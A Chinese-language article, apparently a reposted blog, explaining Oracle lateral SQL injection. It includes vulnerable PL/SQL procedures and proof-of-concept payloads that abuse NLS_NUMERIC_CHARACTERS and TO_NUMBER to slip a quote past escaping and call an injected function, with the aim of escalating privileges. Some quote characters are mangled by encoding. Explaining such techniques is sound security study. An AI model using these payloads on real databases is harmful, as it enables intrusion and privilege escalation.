• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    ORACLE LATERAL-SQL-INJECTION 个人见解
    如果直接执行SQL语句或者参数绑定则不用担心太多,
    如以下ORACLE存储过程
    create or replace procedure kjdatepoc(date d)

    as

    begin

    insert into kjdatetable values(d);

    commit;

    end;

    根本不需要担心遭受到SQL新型注入攻击,那么在什么地方会发生DATE 以及 NUMBER的注入攻击呢!?一般都是采用了动态SQL而又不采用参数绑定的语句。

    例如工程师经常用的DBMS_SQL或者EXECUTE IMMEDIATE

    看以下存储过程

    create or replace procedure kjdatepoc(date d)

    as

    begin

    execute immediate ‘insert into kjdatetable values('|| d ||')';

    commit;

    end;

    那么遇到以上的存储过程或者函数等,也通过修改SESSION中的NLS_DATE_FORMAT中的值达到SQL注射的目的,

    老外的PAPER讲解得非常详细了 ,我在这里也不废话。

    惟独对于 NUMBER类型的注射没有多作讲解 只是简单演示了可以输出单引号!

    看以下语句

    ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';

    SELECT to_number(1000.10001,'999999D99999′)||” FROM DUAL;

    输出一下结果

    1000′10001

    只是多了一个单引号,那有什么用呢?乐观的来说!在特定情况下是很有价值的!看以下一个存储过程

    create or replace procedure NumInjPoc(kjexpnum number,kjexpstr varchar2)

    is

    SecStr varchar2(1000);

    begin

    SecStr:=replace(kjexpstr,””,”””);

    sys.dbms_output.put_line('SELECT * FROM DUAL WHERE ID='||kjexpnum||' and name=”'||SecStr||””);

    end;

    内部对varchar类型进行替换了!我们可以进行测试

    begin

    numinjpoc(1000,”'–');

    end;

    其输出SQL语句为

    SELECT * FROM DUAL WHERE ID=1000 and name=”'–'

    单引号被转义掉了

    那么如果我们结合这个NUMBER类型怎么进行注射呢?

    ALTER SESSION SET NLS_NUMERIC_CHARACTERS=”'.';

    begin

    numinjpoc(TO_NUMBER(0.10001,'999999D99999′),'||kj.exp()–');

    end;

    看看输出结果

    SELECT * FROM DUAL WHERE ID='10001 and name='||kj.exp()–'

    这样就可以间接的攻击它…

    在某中程度才来需要ALTER SESSION 配合后,再去攻击系统内部的一些函数或者过程来提升权限。未尝不是一种好的突破思路,但是对于单语句进行SQL注射攻击,以结果为向导的话!这样的方式没多大作为。
    上一篇:oracle下巧用bulk collect实现cursor批量fetch的sql语句
    下一篇:Oracle入侵常用操作命令整理
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯 版权所有

    《增值电信业务经营许可证》 苏ICP备15040257号-8

    ORACLE LATERAL-SQL-INJECTION 个人见解 ORACLE,LATERAL-SQL-INJECTION,个人,